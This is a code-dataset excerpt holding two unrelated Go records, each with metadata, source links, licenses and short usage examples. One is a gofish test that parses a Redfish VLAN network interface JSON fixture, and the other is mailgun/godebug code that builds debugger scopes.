t.Errorf("Invalid VLAN ID: %d", result.VLANID)
}
} | TestVlanNetworkInterface tests the parsing of VlanNetworkInterface objects. | https://github.com/stmcginnis/gofish/blob/d33a9c3efa5e173d33618942c693c094f587b3ac/redfish/vlannetworkinterface_test.go#L27-L50 | package redfish
import (
"encoding/json"
"strings"
"testing"
"github.com/stmcginnis/gofish/common"
)
var vlanNetworkInterfaceBody = `{
"@odata.context": "/redfish/v1/$metadata#VlanNetworkInterface.VlanNetworkInterface",
"@odata.type": "#VLanNetworkInterface.v1_1_3.VLanNetworkInterface",
"@odata.id": "/redfish/v1/VlanNetworkInterface",
"Id": "VlanNetworkInterface-1",
"Name": "VlanNetworkInterfaceOne",
"Description": "VlanNetworkInterface One",
"VLANEnable": true,
"VLANId": 200
}` | BSD 3-Clause New or Revised License |
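The test above doubles as usage documentation; outside a test, decoding the same kind of payload needs only the exported VLanNetworkInterface type and encoding/json. The JSON literal below is a hypothetical payload a Redfish service would return, trimmed to the fields the test checks.

package main

import (
	"encoding/json"
	"fmt"
	"log"

	"github.com/stmcginnis/gofish/redfish"
)

func main() {
	payload := []byte(`{"Id": "VlanNetworkInterface-1", "Name": "VlanNetworkInterfaceOne", "VLANEnable": true, "VLANId": 200}`)

	var vlan redfish.VLanNetworkInterface
	if err := json.Unmarshal(payload, &vlan); err != nil {
		log.Fatal(err)
	}
	fmt.Println(vlan.ID, vlan.Name, vlan.VLANEnable, vlan.VLANID)
}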
mailgun/godebug | lib/env.go | EnteringNewChildScope | go | func (s *Scope) EnteringNewChildScope() *Scope {
return &Scope{
Vars: make(map[string]interface{}),
Consts: make(map[string]interface{}),
Funcs: make(map[string]interface{}),
parent: s,
fileText: s.fileText,
}
} | EnteringNewChildScope returns a new Scope that is the
child of s and internally sets the current scope to be
the returned scope. | https://github.com/mailgun/godebug/blob/bfb01ae9c26601793d8cf00f074489f7ad52288a/lib/env.go#L47-L55 | package godebug
import (
"fmt"
"reflect"
"strings"
"github.com/mailgun/godebug/Godeps/_workspace/src/github.com/0xfaded/eval"
)
type Scope struct {
Vars, Consts, Funcs map[string]interface{}
parent *Scope
fileText []string
}
func EnteringNewFile(parent *Scope, fileText string) *Scope {
return &Scope{
Vars: make(map[string]interface{}),
Consts: make(map[string]interface{}),
Funcs: make(map[string]interface{}),
parent: parent,
fileText: parseLines(fileText),
}
}
func parseLines(text string) []string {
lines := strings.Split(text, "\n")
if len(lines) > 0 && lines[len(lines)-1] == "" {
lines = lines[:len(lines)-1]
}
return lines
} | Apache License 2.0 |
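A sketch of the nesting pattern these constructors support. The import path is an assumption based on the record's path (lib/env.go holds package godebug), and the stored values are purely illustrative.

package main

import (
	godebug "github.com/mailgun/godebug/lib" // package godebug lives under lib/
)

func main() {
	x := 42

	// File-level scope: no parent scope, plus the file's source text so the
	// debugger can display lines later.
	fileScope := godebug.EnteringNewFile(nil, "package main\n\nfunc main() {\n}\n")
	fileScope.Vars["x"] = &x

	// A child scope gets fresh maps; its parent pointer lets later lookups walk
	// back up the chain (the lookup code itself is not part of this snippet).
	blockScope := fileScope.EnteringNewChildScope()
	blockScope.Consts["limit"] = 10
}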